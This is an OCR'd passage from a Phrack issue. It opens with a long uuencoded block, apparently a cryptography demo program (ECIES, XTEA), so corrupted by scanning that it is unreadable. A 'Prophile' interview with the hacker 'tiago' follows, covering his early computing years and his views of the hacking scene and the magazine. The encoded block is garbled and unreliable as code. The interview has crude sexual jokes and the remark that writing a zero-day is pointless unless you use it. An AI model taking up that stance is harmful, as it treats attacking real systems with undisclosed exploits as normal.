M("*@("@ 
M7V-B8V 


K (SX] 


M96X 
M86, 
M8VE 
M(#T 


L(& 
L (# 
P:&5 
@34E 


= 


‘I.PH@ (SE 


, 


-*#@L ( 


M(" Va (13 


ac" yacu ‘@ 


M7VUE>65 
M"B *@=6EN 
M96US970 
M: 6YI=%] 
M(%A4143? 
M:2*\ (#@ 

M(#$V.PH@ 
M*BHJ*BHJ 
M*B\*"G90: 
M*B!G96YE 
M:&$R(&)U9 
M35=/4D13("H@. 

M"B*@97AP7WO0@:SI 
M7V-O<' DH>"P@>2P@ 
M>2P@:RD["B*@ 
M871E (&ME 


H87 (@ 
R7WO@ 


DH:R 
YC 7 
[ (&D 
@(’T*?0 
HJ *BHJ 
14-) 


PQ 
VH 


H@ 


Li 


296YC:7! 
3B@X+"!S: 7IE*3L* ("* 


(" yac" yaq" ‘@ 
("*O*B!C86QC 
UA8RAC:&%R("IM86,L(&-O; G-T 
Mt) Ce VYSSH" C2 GOR ("I 
D["B*@6%1% 
. S#) #2552 4RAMB8E6, @ 
R7V) L;V-K*&UA8R 
-I>F41I.P 
M"B*@("*@(&UA8UMI72!>/2%d 
M; &]C:RAM86,L(&LI.PH@("*@ 


M1&%V: 65S+4UE>65R (&—-O; G-T<G5C 


H;WST+" SPH" *X*3 


K*RD* 
H* 
'A(’ !U8FQI8R] 


*M("AS14=2144 


* 


<’)I;G1F*") (97)E 
>2!P86ER.EQN (B 


Wwf 


P*3L@24Y4 
97) 2?8FQO8VL 
(&90<BAI (#T 
9EMI73L* ("* 
(" a Cos as VGN 


iT 


Oo @ Gna 


ec 


(&) 


U 


R!K6S%= 
28%24S) ) 3EOH: V5Y 


H["B*@:6YT(&D["B* 
Aes) 
>2°K/2*H*'H@ 


7 &5N+"!1.PH 
) 


36 


( 
( 
"Y@ ( 


W yacu yac" ‘@ 


(" ‘@ (" “a o™ yac" yac" e@("\T(" 1H92!85S5! 


7!H97) 2?8FQO8VL 


(&) 


"!U:6YT,S) 2="!S=6T@/2* 


ss 


ee 
"BY 
"il 


eam 


"AD871A("L@-"D 
/#P 
‘@ ('- 
L@>2D 
2$%24RA 
OHE("*@("*@("*@ 
Ww yac" ‘@ (" ‘@ (" ‘@ 
4%5?8W1LR7V- 
"TKO7DI(‘I["B*@ 
(&-H87 (@ 
\L92AS:71E 
U9B * 
IKE 3h0'%@ 


c 
i 
ec 


-=*3L* (" 
xe (#41 Ge 
SE.S#) # 


U 


@ 


Cus 


+R 


[ 


Why 


3 & 


H@ 
R>7!T*&-H 


:2*°\ (&QE;CL@:2 
+3T@; &5N.P 
(" Yaqu ‘@ (" 


6QA=&4@=6A 


Gl 


K97 
O5)1;F 


DI"GL 
ET7VM 


xm 
E>2A 


5 


P@ 
H@ 


2R 
(" 


[ 


re 


R* 


eC 


i 


Ge 
ach 
N 


(CY Ae CE see ‘@ ( 


*F]uU=" 
:ULT73 


P@8V]N<WOG@ 
L* ("!C2&R( 
L* ("!W: &] 
:6X1.PH@("*@; 
97) 2?8FQO8VLH 
("*@("*@;W5STO6VE= 
+RHJ*BHJ*BHJ*B 
*BHJ*BHJ*BHJ*B 


@=VAI; &4H 


K.PH@("*@ 
‘M/2! 


EO; BXJ+ 
8VAAK<B*J: 


15-?9V5N97) A=&5?:V5Y7W! 


04, @*B\*=F 
(@*FLA=&SL(& 


T,3) 2="1K6S1=.P 
!K97DI.PH@ (SI 
T+"!S:71IE*3 
<VEZ92D 


DP 


@/2*P.R! I (#E 


Wt 


&D 


] ($- 
@9F] 
>(H 
K/2! 


7B*‘H<W5M("L 
D871A+"!Y*3L 


@ 


(Gi 


87 ( 


E;B* 
@(’T 
@c"’ 
rg"! 


K6S! 


* &ME>2 * 


#2$% 


p+"! 
(05) 
R*&D 
@/CxX 
D9I6Q 


96YC<GE 
*PLA 
=6EN=#, R7TWOG 
8G5F6SA=. 
*2!1 ("BQ 
K (#0L (&-T<BLK* 3] 
(&QI 
K*OH 


\ 


Qc" 


@ 


PH 
(«wl 


] 
@ 
* - 
@ 
8 


K 
2 


K 


D 
3 


> ® 


ec 


TL 
@ 
@ 
@ 
P 


@ 
) 


(3 


#2$%2 
18585! 
He 


6%1%05] 
LO6X["B*@?01 
@("‘@+RHEG@; 6] 
PIV; VED (SA 
6XL (&E 
!'T; GO 
(ET 


;woT+" 


WN 


C5 


&) U9EL 


I73L 
HJ*B 
HJ*B 
jr9" 


a Ga 


P<FEV8 


T1E (&ME R(" 


= 


3E5-5TJ21%, 


ec 


i 


eC 


*R*Q72E 
ARN G2 
("!G9712<FSN9&]M7V5X<&]NIOYT*EL 
8F%SS95]X+"!B87-E7W 


PD 


@*F)U 
‘oO (#0[ 


G!T<B*] (& 
"B*@96Q0E; 5 
TP. 


H@ 
D: 691960 
4145298SV: 
N="!1;&5N*OI 
* ("IM 
A414%? 
X*3L* ("*@ 
(&90<BAI (#T@, # 
(SEN (" 
J*BHJ*B 
*BHJ*B 
vac" ‘O 


* 
an 


GCe+~- TOO 


DI.PH@(’ !O:6YT7V 


U 


(&ES ( 


, 


EO=7 (@;F5W(’! 


D["B*@8F 


M<FEN=68 
M;U]H97@ 
M=') 2=6] 
M+"!B=69P=" (I.PI] 
M96U2="UP86ER (& 
M) R‘J+PII;G0@14-) 
M* &-0; G-T (&51L96 


=, 
E!U 


( 


8FOQI8 
8G5F+"!Y*3LG@ 
22:&5X*&) UIBP 
ES 


U2=" 10 


DZ("5S.B(L( 
)1;GLF*" ( 
D[(’! 
Y@aq"s 
SL:60 
UB9I61 

P@8V]N<WOG@ 


R!K97 


<! 


W 


@H 
(&$ 
15-? 


@+RH@ 


M("AB:71S=" ) ?<V. 


EZ96ENSFET<RAO>"D@ 


M<VEZ96EN8F 
M*S!X+"!0>2DQ@?! 
M.B*Q.PI]"@H@(" 
M:&%T ("AO>"Q0>2 


D@ 


MEM UCEVY SEH" C25 


ET<RAO>2 
P@(2!1 
*@("O*B!IS86 


M; GO@14-) 15-?<’ 5B; &EC7VM 
R 


D@/B!$14=21441 ( 
<U]P; VEN 
UE (’ 1H 
9V5N97) A=&5S (&$@ 
B>5 
D*>P 


("IO0>2 


M<W1R7W! A<G-E*’ @ 
M(#P@, "DI"B*@ 
M8FQI8U] K97E? 


=F% 


@("!ROT71LU<FX 
1: 61A=&EO; BAX+"!Y*2°*\ (#*I"B*@("! 


(SIX*2°\ (#ST (7 OX ( 


<W1 


E<UQN (B 
R: 6YT9B@B4’ )I=F%T92! 
8VAE8V 
@<&]1I;GO0 
D961?<’ 5B; GEC7VME>5]V86Q0 
96Q0E;5]T(S!Y*OI["B* 
/B!$14=2144 


;E)]C=7)V92A0>" 
QW) O=7 *@; V8G@; W) 


]V86Q19&%T:6]N*&—-O; G-T (&-H87 (@ 
H@ (&5L96U2="!X+"!Y.PHE (& 


R7W1O7VAE>"AB=68 


&) 


P@8G5F<’1 


3L 


% 


@: 
@ ( 


@ 


ae 


Uv 


U 


T(7@L(’ 


@ 


H 


wt 
K (SY 
D 


1] 
HJ 


@ 


Uv 


Uv 


C 
5 
[ 


(7 !O:6YT 


PeQ 


U 


U8FOI8R] 


L(’@ 


UIG! T<BD[ (‘H@ (&) I=’ -T<E 


@ 


@ 


ec 


; VX@=GAE (&- 


TO\"BYA(T™! 


P;VE 


6YG+"!B=70@8VAE8V 


D97 


("sg 
19&% 


H>"P 


I.R! 


] 


("= 


Ts*6:) 
@<F5T=7) 
I (’O\ ("AB:71S=')? 
N=%] I1<U]2Z97)0 
P@4’DI(#\@ 
1@86QS; 
(@;B*d 


+38 
R! 
PI 


E! 


* 


"AB: 71S=" ) 2?<&% 


EF ("@H 
R<V4H>2P@ 
@+3S5["B*@:68@*S5#24537V5M8F5D9&5D7W!U 
R9T7T1LU<FX@ 


8E 
4’ 


G 


D 


+35 


Bat 


@ 


P<FEV 


P 
T 


R*3L* ("!B: 71S 
K97DZ("5S7&XB 
&AA="!A (&=I=F5N (&5L 
U<G9E 


O 


N 
N 


@ 
I 
Xx 


I 


3.txt Wed Apr 26 09:43:44 2017 37 


M"B*@<&]1;G1?; 75L="AX+"!Y+"!B87-E7V] R9O&5R*3L* ("!ROT1LU<FX@<&] I 
M;G1?:7-?>F5R; RAX+"!Y*2°_ (#$@.B‘*M, 3L* ?0H*=F] 19"! S0TES4U] K9&8H 
M8VAA<B*‘J:SSL(&-H87 (@*FLR+"!C; VYS="!E; &SM7WO@6GEL("*@("*O*BIA 
M(&YO; BUS=&SN9&SRO"!41S8A*B\*"2°@("*A("!C; VYS="!E; &SM7WO@4G@L 
M(&-O; G-T (&5L96U?="!2>2D*>PH@ (&EN="!B=69S: 71E (#T@*#, @*B*H-" JT 
M(SY535=/4D13*2 ‘K (#$@*R‘*Q-2D@) B!%, 34["B *@8VAA<B! B=69; 8G5F<VEZ 
M95T["B*@; 65M<V5T*&) USBPG, "P@8G5F<VEZ92D["B*@8FET<W1IR7V5X<&]R 
M="AB=68L (SI1X*3L* ("!B: 71S=" ) 2?97AP;W) T*&) U9B *K (#0@*B! .54U73U) $ 
M4RP@4G@1L.PH@ (&) I=’ -T<E] E>’ !O<GOH8G5F ("L@."*J3(SY535=/4D13+"!2 
>2D["B‘*@8G5F6SSR ("H@3E5—-5T] 21%-= (#T@, #L@631%505]D879197—-?; 65Y 
97 (H: SSL (&) U9BP@8G5F<VEZ92 ‘0 (#$V*3L* ("!B=69;,3(@*B! .54U73U) $ 
4UT@/2°*Q.R!85$5! 7VIA=FEE<U]M97EE<BAK, 2 *K (#@L (&) U9BP@8G5F<VEZ 
M92 ‘O (#S$V*3L* ("!B=69;,3(@*B! .54U73U) $4UT@/2*R.R!85$5! 7VIA=FEE 
< 
3 
3 


wu 


U] M97EE<BAK, BP@8G5F+"!B=69S:71E("\@, 381.PH@ (&) U9ELQ, BJ ($Y5 
5=/4D1372*] (#, [ ($A414%?9&%V: 65S7VUE>65R*&LR("L@."PQ@8G5F+"!B 
69S: 7IE("\@, 381.PI] "@HC9S5F: 6YE ($5#24537T] 615) (14%$ ("@X ("HG 
E5-5T] 21%, @*R*X*OH* (MA (MA(MA(MA(™*A("*@+RHA1L4—-) 15, @IEYC 
M<GEP=&E0; CL@=6AE (’) E<WSL=&EN9R!C:7!H97 (@=&5X="!M97-S86=E ("=I 
Mj &PQBFA*(MA(M ACM ACTA (MACH ACMA (M ACM A(T A(MA(MA("G 
M("*@("*H; &5N ("L@14—) 15-?3U9%4DA%040I (&) Y=&5S (&Q0; F<@*B\*=F]I 
M9"! $0TES4U] E; F-R>7!T:6]N*&—-H87 (@*FUS9IRP@8V] N<W0@8VAA<B ‘J=&5X 
M="P@:6YT (&QE;BP@"@D) ("*@(" *@8V] N<WO@8VAA<B ‘J4’ @L (&-0; G-T (&-H 
M87 (@*E!Y*OI["B‘@96QE; 5]T(%)X+"!2>2PQ6G@L (S1Y.PH@ (&-H87 (@:S3; 
M, 39=+"!K, ELQ-ET ["B‘@97AP7W0@:SL* ("!D;R! ["B*@ ("!G9712<FSN9&]M 
M7V5X<& ]N96YT*&LI.PHG (" ‘@8FET<WLR7W! A<G-E*%IX+"!0>"D["B*@("!B 
M:71S=" ) ?<&%R<V4H6GDL (%!Y*3L* ("*@ (7 !0: 6YT7VUU;’ OH6GGL (S1Y+"!K 
M*3L* ("*@ (7 !0: 6YT7V10=6) L92A:>"P@6GDI.R*@("*@("*A("*A("*A(" A 
M("*@("*@("*@("\T (&-O9FSC=ETR (&@@/2 *R(&]N($ (Q-C, @*B\* ("!] ("=H 
M: 6QE*’ !0: 6YT7VES 7WIE<F\H6G@L (S1Y*2D["B‘@<&]1;G1?8V]P>2A2>"P@ 
M4GDL (&) A<V5?>"P@8F%S95] Y*3L* ("!P; VEN=%]M=6QT*%) X+"!2>2P@:RD[ 
M"B‘@14—-) 15-2: V1F*&LO+"!K, BP@6G@L (%) X+"!2>2D ["@H@ (&) I=’ -T<E]E 
M>’ !0<GOH; 7-G+"!2>"D ["B @8FET<WLR7V5X<& ] R="AM<V<@*R‘T ("H@3E5- 
M5T]21%,L(%) Y*3L* ("!M96UC<’ DH; 7-G ("L@." ‘J ($Y¥535=/4D13+"!T97AT 
M+"! L96X1I.PH@ ($A414%?8W1R7V-R>7! T*&US9OR *K (#@@*B! .54U73U) S4RPQ 
M; &5N+"!K, 2D["B*@6%1%05] C8F-M86, H; 7-G("L@." ‘J ($Y535=/4D13 ("L@ 
M; &SN+" !M<V<@*R *X ("H@3E5-5T] 21%, L (&QE;BP@:S(I.PI]"@H@("*@("*@ 
MEME (OG ACS (™ PE (MAMIE (NE (™ GE PIA (™ EC" (M Al PIE 

D 

) 

D 


5 


wu 


M("*@("°@+RH@14-) 15, @9&5C<GEP=&EO; B‘J+PII;G0@14-) 15-?9&5C<GEE 
M=&EO; BAC: &%R("ITO7AT+"!C; VYS="!C: &$R ("IM<V<L (&EN="! L96XL (*H 
M"2°@("‘@8V]N<WO@8VAA<B ‘J<’ ) I=FME>2D*>PH@ (&5L96U?="!2>"P@4GDI 
M(SIX+"!:>3L* ("!C:&3R (&LO6GSSV72PQ@:S) 7, 39=+"!M86-; .ST["B@97AE 
M7WO@9#L* ("!B:71S=") ?:6UP;W) T*%) X+"!M<V<I.PH@ (&) I=’ -T<E]1;7!0 
M<GOH4GDL (&US9R *K (#0@*B! .54U73U) $4RD ["B*@: 68@*$5#24537V5M8F5D 
M9&5D7W! U8FQI8U] K97E?=FSL: 61A=&E0; BA2>"P@4GDI (#P@,"D*("‘@(")E 
M='5R;B‘M, 3L* ("!B:71S=" ) ?<&SR<V4H9"PQ@<! ) I=FME>2D ["B*@<&]1;G1? 
M8V]P>2A:>"PQ@6GDL(%) X+"!2>2D["B*@<&]1;G1?; 75L="A:>"P@6GDL (&0I 
M.PH@(’ !0:6YT7V10=6) L9O2ZA:>"PR6GDI.R*@("*A("A(M@(MA(MA(™Q 
M("*@("*@("*@+RH@8V]F86-T;W(@:""] (#(@; VX@OCSV, R‘J+PH@ (&EF ("AP 
M; VEN=%] I<U] Z97) OF SIX+"!2>2DI"B*@ ("!ROTLU<FX@+3$ ["B‘@14-) 15-? 
M:VLF*&LO+"!K, BP@6G@L (%) X+"!2>2D ["B*@"B ‘*@631%05] C8F-M86, H; 63C 
M+" !M<V<@*R*X ("H@3E5-5T] 21%, L (&QE; BP@:S (1.PH@ (&EF ("AM96UC; 7‘H 
M; 63C+"!M<V<@*R*X ("H@3E5-5T] 21%, @*R! LOGXL (4@1*OH@ ("*@<F5T=7) N 
M("TQ.PH@ (&UE; 6-P>2AT97ATH" IM<V<@*R °X ("H@3E5-5T] 21%, L (SOE; BD[ 
M"B‘@6%1%05] C=" ) ?8W) Y<’ OH=&5X="PQ; &SN+"!K, 2D ["B*@<F5T=7) N(#5[ 
M"GT*"B\ J*BHI*BHI*BHJ*BHJ*BHJ*BHJ* BHJ* BHJ*BHJ*BHI*BHJ*BHIJ*BHI 
M*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ* BHJ* BHJ* BHJ* BHJ* BHJ*BHJ*BHO" @IV; VED 
M (&5N8W) Y<’ 11; VY?9&5C<GEP=&E0; E] D96UO* &-0; G-T (&-H87 (@*G1E>’ OL 
M (&—-O; G-T (&-H87 (@*G! USFQI8U] X+ ‘H) "OD) 8V] N<WO@8VAA<B ‘J<’ 5B; &EC 
M7WDL (&—O; G-T (&-H87 (@*G!R: 79A=S&4I"GL* ("!1; GOR; &5N (#T@<W1R; &5N 
M*’1E>/ OI ("LG@, 3L* ("!C:&3R ("IE; F-R>7!T960@/2!M86QOL;V,H; &5N("L@ 
M14-) 15-?3U9%4DA%0401.PH@ (&-H87 (@*FLE8W) Y<’ 1E9"*] (SUA; &QO8RAL 
M96X1.PH* ("!P<FEN=&8H (G! L86EN (’ LED’ 0Z ("5S7&XB+"! TOTAT*3L* ("1% 
MOTES4U] E; F-R>7!T:6]N*&5N8W) Y<’ LE9"P@=&5X="PQ; &5N+"!P=6) L: 6-2? 
M>"P@<’ 5B; &ECTWDI.R*@("\J (&5N8W) Y<’ 11; VX@*B\*"B'@: 680*S5#2453 
M7V1E8W) Y<’ 11; VXH9&5C<GEP=&5D+"!E; F-R>7!T960L (&QE; BP@<’ ) I=F3T 
M92D@/"*P*2‘O*B!D96-R>7!T:6]N("HO"B *@ ("! P<FEN=&8H (F1E8W) Y<’ 11 
M; VX@9F 31; &5D (5QN (BD["B *@96QS90H@ ("*@<’) 1; GLF*") A9G1E<B!E;F-R 
M>7!T:6]N+V1E8W) Y<’ 11; VXZ ("5S7&XB+" !D96-R>7!T960I.PH@ (*H@(&9R 


wu 


3.txt 
M964H96YC<GE 


M=' ) ?<&@R<V4 
“Py ‘P, #* 


Wed Apr 26 09:43:44 2017 38 


P=&5D*3L* ("I F<F 


H<&]L>2P@(C@P, # 
P,&, Y(BD["B‘@8F 


M9#0Y.30V,S= 
9 
( 


M(&) I=’ -T<E] 


M<FEV871E (&M 


SY, #=B.&,Y-3-C83ST.#%E8C 
'-T<E]P87) S92AB87-E7W@L (" 


B.#,T,V4S-B(I.P 


E>2!P86! 


M;F-R>7!T960B+‘H) "0 


M-&9B93 (X-#51 


E93,R9&-E-R(L(* 


M, F8W-&) D-C@S-CAD . 3<¥93 (V-6 
M, #, V.30Q939C-SA 
M(#*["GT*"B\J(&8X-F,Y,C*‘S.6 


) -3=C-6, @*B\* 


ay 


end 
size 15669 


5E*&1E8W) Y<’ LEO"D["GT*"FEN="!M86EN 


M*"D*>R‘@(" yacqu ‘acu yac" yacu Tae 
M("*@("*@("\T (7 1H92!C; V5F 9FI 


‘P, #* 


(s9c! 
H@ (&) 


409F) C-F,W, 6SP, #DT9FSR8V1D-30 


P87) S92AB87-E7V] R9&5R+" ‘B-#°P, #°P, #°P, #°P, #°P, #°P 
M, #°R.3) F93<W93<P8SSR830R, S1C, S, B*3L*"B‘@+R] S0TES4U] GO6YE<FST 
M95] K97E?<&SI<BOI.R*@("*@("*@("‘O*B! GI6YE<FST92!A(’ !USFQI8R]P 
ER ("HO"@H@ (&5N8W) Y<! 11; VY?9&5C<GEP=&E0;E]D 
M96U0*") 4: &ES (’ -E8W) E="!D96U0 (&UE<W-A9V4@=VEL; "!B92!%0TES4R!E 
D@("*@("(O8S4V9#, P, F-F-COR83AE, 6) A-& (T.&-C 


@c" yac" yac" Yacq" aa Cn (ad ba Co Gas Vane" ‘@ 


EC: 65N=’, @9F]R(S(Q-C, @*B\* ("!B: 71S 


P,#°P, #°P, #°P, #°P, #°P, #°P, #°P 


ET<WLR7W! A<G-E* &-O969F7V(L("(R, &$V 
SP-3$R9C<X-SOT83,R, #5F9" (I1.PH@(&) I 


E8FSQ-C (X-FSR9O#4W96SP. 3DQ, 38X 
I=’ -T<E] P87) S92AB87-E7WDL (" (P 
U8CSQO8S5C,&,W.3<S,C1F,2(1.PH@ 


wu 


H) "OD@("*@("(T-68T-F5B,S‘*S961F,F4V 


5E,V, 


p Lied) 


P,R(L™"@D) "2°@("*@ (CIE, 3!E-S@W 


D868X83!E.&409&) F86,V.&4R-FOR(BD["B‘*@<F5T=7)N 


D, FOR8SFOR8C@U8S@X, #=A8S) F-VSF 


£86c92039c992d2d2bd2b85c8807Jac2fJaf57ch5c 


|=[ EOF ] 
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phrack.org:”~# cat .bash_history 


==Phrack Inc.== 


Volume O0x0b, Issue O0x3f, Phile #0x04 of 0x14 


| [ PROPHIUL 


ial 


ON TIAGO ] 


| [ Phrack Staff ] 
|=---=[ Specification 


Handle: tiago 
AKA: module 
Handle origin: Lemme call my mom and ask, just a second... 
ok; "it was between pedro henrique and tiago, 
but after looking for reasons that would define 
we decided to throw a coin: head". 
catch him: By producing whatsoever sign/event pair that 
would take my attention and get you the expected 
feedback. 
Age of your body: 24 
Produced in: Southeastern Coconutland 
Height & Weight: 178cm, 70kg 
Urize.. 

Computers: SGI Indy (R4600PC at 100MHz, 128MB RAM, 2GB 
hdd), Sun Ultra-10 (UltraSparc IITi at 440MHz, 
1GB RAM, 9GB hdd), Toshiba Portege 4005 
laptop (Intel P3 at 800MHz, 512MB RAM, 20GB 
hdd). 

Member of: Teletubbies 

Projects: Many fields in computer theory. Software 
Engineering subjects such as: Abstract 
Interpretation, Program Transformation, Reverse 
Engineering, etc. Applied cryptography at work. 
Enjoy hardware design, operating system 
design/implementation hacks, software 
design/implementation security related 
exploitation. Anything that actually takes 
my attention for whatever reason. 


=---=[ Favorite things 


Women: je veux un petite pipe, s’il vous plait 
Cars: I don’t know how to drive 
Foods: taco-taco brrrito-brritooo 
Alcohol: combined with Benflogin 
Music: Symantec iz in tha houuuuuuuuuse!!!!! c’mon 
c’mooooooon sing sing! see tha solution! Symanteeeec, 
revoooolutiooooon... we give yooooooouuu... sweet 
soluttiooooonnss \o\ /o\ \o\ /o/ We! got your personal 
firewalllz! ... dunt dunt.. 
-> http://www.phrack.org/symantec_fancyness.mp3, 
por favor. 
Movies: GOBBLES.avi 
Books & Authors: HUHU, books are fancy q:D -- stuff that have been 
remarkable on my near past. still reading some: 
Whom the Gods Love: The Story of Evariste Galois, 
infeld, (spanish, by Siglo Veintiuno Editores) ; 
Computer Architecture: A Quantitative Approach, 
hennessy & patterson (english, by MK); 
Comprehensive Textbook of Psychiatry, kaplan & 
sadock (english, LWW); 
The Art of Computer Programming, vol. 1-3, knuth 
(3rd Ed., Addison Wesley) -- <3 dutchy; 
Systems and Theories in Psychology, marx & hillix 
(portuguese, by Alvaro Cabral); 
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Cognitive Psychology and its Implications, anderson 
(portuguese, by LTC); 
Axiomatic Set Theory, bernays (english, by Dover, 
2nd Ed., 1968-1991); 
La Fine della Modernit, vattimo (portuguese, by 
Martins Fontes); 
Grundlegung zur Metaphysik der Sitten, kant (english, 
by H.J. Paton); 
Einfhrung in die Metaphysik, heidegger (english, by 
Gregory Fried and Richard Polt); 
Principia Mathematica, russel (english, by Cambrige 
Mathematical Library, 2nd Ed., 1927-1997); 
Uber formal unentscheidbare Satze der Principia 
Mathematica und verwandter Systeme, I, gdel (english, 
by B. Meltzer); 
Tractatus Logico-Philosoficus, wittgenstein (english, 
by Routledge & Kegan Paul); 
A Philosophical Companion to First-Order Logic, 
hughes (english, by R.1.G.); 
Freedom and Organization 1814-1914, russel (english, 
by Routledge) ; 
Ethica, spinoza (english, by Hafner); 
Gdel’s Proof, nagel & newman (english, by NYU); 
Zur Genealogie der Moral, nietzsche (english, by 
Douglas Smith); 
Theory of Matrices, perils (englisn, by Dover, 
1958-1991); 
Modern Algebra, warner (english, by Dover, 
1965-1990); 
Security Assessment: Case Studies for Implementing 
the NSA -- National Symposium of Albatri; 
Urls: www.petiteteenager.com 
I like: HUHU’ing 
I dislike: not HUHU’ ing 


|=---=[ Life in 3 sentences 


iw) 
(9) 
ll 


DH -— TDS 
|=---=[ Passions | What makes you tick 


Too complex to be described with a set of words: totally undecidable; 
cannot be solved by any algorithm whatsover -- equivalently, english, 
portuguese, .... Cannot be recognized by a Turing Machine, of which 
should halt for any input... 


but for coconuts! 
|=---=[ Which research have you done or which one gave you the most fun? 


Anything that made me stop and, extra-ordinarily, question the extra-ordinary. 


|=---=[ Memorable Experiences 


Going against my family and staying at the computer through nights. 
Having this to allow me to have fun and feel pain. Looking for the 
utopic job. Going to south Brazil, Mexico, and northeast Brazil to find 
it. Meeting the people I have met through this quest, seeing the 
history I have seen passing in front of my eyes in every place I 
stepped. Being drunk, being sober, falling down and off. Getting 
fucking up and HUHU’ing again. And again. 


Feeling, being cold, believing and being agnostic. Fighting. Getting girls 
for the pleasure and falling apart for theirs. Prank-calling, chopp-touring, 
writing, counting. Stopping. 


Looking for sharks, surfing, breaking my phusei-self. Going and 
bringging others into this. 
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|=---=[ Quotes 


HUHU 

\o/ 

/o\ 

wish I was dead so I could be happy and safe! 
\o\ 

q:D 

Par) 

you better call someone smart! 

\o\ 
Sy 
I’d rather have 300 beers a month than a formal education 
/o/ 

<3 


| =[ Open Interview General boring questions 


Q: What was your first contact with computers? 

A: Since really young I used to go to my grandparents’ on the weekends. 
When I was 8 I started having some fun by sniffing around my uncle’s 
electronic lab located at the back side of his room (the guy was an 
electronic eng. grad. student at the time). Fetching experiences 
from the subject I can tell I used to go crazy about the place -- 
serio. From encyclopedias, through pieces of plastic, ending in 
broken VCR’s and widely exposed TV’s. In certain saturday of my 11’s 
there was little tiago playing around that room: I can clearly 
remember climbing (theo style) the closet, looking for fun objects, 
when I faced this box; I took it, I opened it, I faced a computer. 
Assembled by some brazilian manufactor, there was the CP200 with a 
board based on a Z80A CORE. There was tiago huhu’ing around because 
of that piece of fancyness. It lasted for exact 3 months, till the 
day the tape that was responsable for connecting the keyboard to the 
main board got screwd; ripped -- R.I.P. 3 months were enough for 
playing around with basic BASIC and abstracting that new fancy 
stuff. The time went through and I haven’t had the possibility of 
having a computer again. In january 1996 I went to Sao Paulo, kids 
vacations you know. I stood with an uncle whom had this company of 
which had some DOS based machines, maintained by this Clipper 
programmer. I remember perfectly being "taught" how to turn on the 
computer an press the keys. Very few time after this moment I was 
being introduced to this very fancy toy known as PCTools -- anyone? 
Yes, there was 15 year old tiago, who could barely turn on that 
thing, giving his first steps on revers ngineering. 15 days, that 
was the exact time of my exposition to the environment. Again, no 
more computers. August 1999, dad arrives home with a Packard Bell 
station. It was a Pentium MMX at 166MHz, with the amount of 16MB of 
RAM, and a 3.1GB IBM hard disk. Not just that, it had multimedia 
fancyness and the great thing known as modem. It carried, and was 
being carried by, a Windows 98 operating system. Wow! tiago had his 
first modern computer. Yes. But wait, where is my black screen full 
of unintelligible numbers written on green letters?! Fuck this! 
Frustration... time... Internet! time.. ICQ! time ... IRC, #hacking. 
"vo, click start menu, execute. Now type: telnet huhu. fancyworld.net 
1470" -- orgasm --. It happened till the day I questioned what those 
sequence of magical pressed-keys actually meant. And then it 
began... HUUUU! coding! HUHUHUHHUHHUHUHUHUHUHUHUHUHUHUHUHUHUHU 
HUHUHUHUHUHU :D:D:D q:D \o/ \o\ /o/ /o/ /o\ \o/ 

But yeah, that crazy image of a bunch of green code in a dark screen 
never went out of my mind, I needed to go lower-level... and so I 
went, and keep on going, to never reach, to never end. 


Wait, I would like to make a comment out of the belou, kthx: there 
is no point to writting zero-day if you are not going to use it! 
I’m welcome. 
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Q: What was your first contact with computer security and how important 
for you is computer security relative to your interest in computers in 
general? 

A: In the end of the above story. After that I’ve met some other 
coconuts who have been responsable for my first real adventures in 
security. That was the real kick: reading phrack and going HUHU, 
reading code, not having a damn clue of what it was doing, and being 
days awake till I could get the mininum insight. Getting bored of the 
"usual" things, giving the finger to the "common games" and comming to 
play in whatever I pleased. 
How important? It transformed me into a new form of coconut. 


Q: Being relatively seperate from the "scene" in general, what was your 
opinion on the concept of "the scene" and was your distance from this 
concept (that may possibly exist) deliberate or not? 

A: As I see, it is just another society around there. 

As the "getting into it" was happening, I tended to get more and more 


detached from this so called "Scene". My being was thrown aside by the 
scene. All I wanted was to sit down and hack. I couldn’t digest it and 
it couldn’t digest my self. I sat back, I played, I watched you guys. 
Q: Actually isn’t the whole current concept of "scene" a big load of 


social correlation and acceptability bullshit? 

A: It is "normal"; expected. Nothing that I don’t see when I go to the 
bakery or to a club with friends. People "look", people perceive, 
people infer people judge based on their a priori context. 

What in the hell am I doing? 


Q: What do you think of Phrack magazine? Do you think it should be 
"resurrected" or continued to be maintained? If so, do you think it 
should change themes in any way (since many suggest that phrack is no 
longer a magazine for hackers but some bullshit academic fame making 
fluff for the computer security industry)? Would you rather see a 

Phrack that exclusively published movie reviews and cooking tips? 

A: It was responsable for many HU’s bumping inside my head. I jumped, I 
got pissed, injuried and healthy. It gave me inputs, it drove me to 

many outputs, where all the results in between thes vents wer 
responsable for keeping this coconut going on. Going on is the point, 

why to stop it? I was getting bored of the articles, yes. But I believe 
this is more for my personal changes than actually the magazine’s. 
However, I see some big tendency of articles (as a reflection of the 
scene) converging always to the same place and getting stuck there, in 

a boring iteration that never ends. I’ve played with Linux’s execution 
environment and the technical specs linked to it, but then I went to 
something else -- this being the same game, now with PalmOS or simply 
going play with Optimization, Obfuscation, or to hack the IrDA’s driver 
of my laptop. How can people write articles on what you call "shellcodes" 
for every single computer architecture, operating system, supported 
ABI’s, supported ISA’s, or whatever? Isn’t that just a matter of 
getting manuals? Why to dissert about the ELF format file and the 
dynamic linking system of some specific plataform without any 
"improvement" (take this as a big boom, I don’t think it’s worth to 
define the term here) in a "hacking technique"? I think that is what 
sucks in phrack nowadays. About the academic style, I have problems 
with formalism myself. Something what I really appreciate in phrack, 
for instance, is this mid-level formalism when compared to the academy. 
I believe it is very interesting the fact that you can submit a 
compilation of techniques with some basic scraps about it, ina 
non-defined format or dissertative way. If people behind it think the 
content is good, it will make it. Though, I also think that the minimum 
formalism is necessary, otherwise it gives excessive room for nonsense 
to be exposed, and I don’t think it is cool for people to read 
"Assembly HOW-TO’s" that "teach" you the usage of some "instructions", 
for some specific plataform, in some very restricted context and make 
the reader to believe they understand about that universe. 

About fame: unfair but expected feel like vomiting whenever I think 
of myths, however if I re-gurgitate myths will deliberately be pulled 
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out, as gastric ulcer, of my very self. 

I would love to s a review of the /home/PORNO/ collection, indeed. 
And I really expect to be having some dope french food till the end of 
the year, yes. 


Q: What do you have to say about that whitehat/blackhat opposition that 
gained more attention in the last years and what do you reply to those 
people calling you a whitehat because one of your project was about 
porting PaX? 
A: How would I get called if I was running in circles and blubbering 
whilst wearing an orange suit? Teletubbie? 


Q: How would you qualify the hacking underground in 2005? Many people 
think there is no more underground because of all the commercial 
bullshit around security. Any comments? 
A: I believe thinking about this is an act of oblivion. You might be 
able to determine several characteristics and classify the pros and 
cons of the process. Though, as the process’ development gets strongger 
its transformation power increases as well, thus the number of 
"ideal-branches" within this social group tend to increase and react 
